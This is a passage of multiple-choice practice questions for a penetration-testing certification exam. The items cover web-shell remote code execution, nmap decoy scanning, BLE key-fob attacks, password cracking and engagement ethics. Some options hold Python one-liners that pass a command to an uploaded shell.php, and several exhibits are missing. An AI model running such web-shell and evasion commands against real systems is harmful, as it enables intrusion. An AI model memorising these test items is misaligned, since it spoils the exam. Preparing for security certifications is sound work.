Quantitative impact assessments given a successful software compromise

D.

Code context for instances of unsafe typecasting operations

Question # 107

During an engagement, a penetration tester was able to upload to a server a PHP file with the following content:

Which of the following commands should the penetration tester run to successfully achieve RCE?

A.

python3 -c "import requests;print(requests.post(url='http://172.16.200.10/uploads/shell.php', data={'cmd=id'}))"

B.

python3 -c "import requests;print(requests.post(url='http://172.16.200.10/uploads/shell.php', data={'cmd':'id'}).text)"

C.

python3 -c "import requests;print(requests.get(url='http://172.16.200.10/uploads/shell.php', params={'cmd':'id'}))"

D.

python3 -c "import requests;print(requests.get(url='http://172.16.200.10/uploads/shell.php', params={'cmd':'id'}).text)"

Question # 108

A security analyst is conducting an unknown environment test from 192.168.3.3. The analyst wants to limit observation of the penetration tester's activities and lower the probability of detection by intrusion protection and detection systems. Which of the following Nmap commands should the analyst use to achieve this objective?

A.

nmap -F 192.168.5.5

B.

nmap -datalength 2 192.168.5.5

C.

nmap -D 10.5.2.2 192.168.5.5

D.

nmap -scanflags SYNFIN 192.168.5.5

Question # 109

A penetration tester is conducting an on-path link layer attack in order to take control of a key fob that controls an electric vehicle. Which of the following wireless attacks would allow a penetration tester to achieve a successful attack?

A.

Bluejacking

B.

Bluesnarfing

C.

BLE attack

D.

WPS PIN attack

Question # 110

A penetration tester was brute forcing an internal web server and ran a command that produced the following output:

However, when the penetration tester tried to browse the URL http://172.16.100.10:3000/profile , a blank page was displayed.

Which of the following is the MOST likely reason for the lack of output?

A.

The HTTP port is not open on the firewall.

B.

The tester did not run sudo before the command.

C.

The web server is using HTTPS instead of HTTP.

D.

This URI returned a server error.

Question # 111

In the process of active service enumeration, a penetration tester identifies an SMTP daemon running on one of the target company's servers. Which of the following actions would BEST enable the tester to perform phishing in a later stage of the assessment?

A.

Test for RFC-defined protocol conformance.

B.

Attempt to brute force authentication to the service.

C.

Perform a reverse DNS query and match to the service banner.

D.

Check for an open relay configuration.

Question # 112

An assessment has been completed, and all reports and evidence have been turned over to the client. Which of the following should be done NEXT to ensure the confidentiality of the client’s information?

A.

Follow the established data retention and destruction process

B.

Report any findings to regulatory oversight groups

C.

Publish the findings after the client reviews the report

D.

Encrypt and store any client information for future analysis

Question # 113

When developing a shell script intended for interpretation in Bash, the interpreter /bin/bash should be explicitly specified. Which of the following character combinations should be used on the first line of the script to accomplish this goal?

A.

<#

B.

<$

C.

##

D.

#$

E.

#!

Question # 114

A penetration tester has gained access to a network device that has a previously unknown IP range on an interface. Further research determines this is an always-on VPN tunnel to a third-party supplier.

Which of the following is the BEST action for the penetration tester to take?

A.

Utilize the tunnel as a means of pivoting to other internal devices.

B.

Disregard the IP range, as it is out of scope.

C.

Stop the assessment and inform the emergency contact.

D.

Scan the IP range for additional systems to exploit.

Question # 115

A penetration tester writes the following script:

Which of the following objectives is the tester attempting to achieve?

A.

Determine active hosts on the network.

B.

Set the TTL of ping packets for stealth.

C.

Fill the ARP table of the networked devices.

D.

Scan the system on the most used ports.

Question # 116

A penetration tester runs the unshadow command on a machine. Which of the following tools will the tester most likely use NEXT?

A.

John the Ripper

B.

Hydra

C.

Mimikatz

D.

Cain and Abel

Question # 117

A penetration tester was able to gather MD5 hashes from a server and crack the hashes easily with rainbow tables.

Which of the following should be included as a recommendation in the remediation report?

A.

Stronger algorithmic requirements

B.

Access controls on the server

C.

Encryption on the user passwords

D.

A patch management program

Question # 118

Which of the following should a penetration tester do NEXT after identifying that an application being tested has already been compromised with malware?

A.

Analyze the malware to see what it does.

B.

Collect the proper evidence and then remove the malware.

C.

Do a root-cause analysis to find out how the malware got in.

D.

Remove the malware immediately.

E.

Stop the assessment and inform the emergency contact.
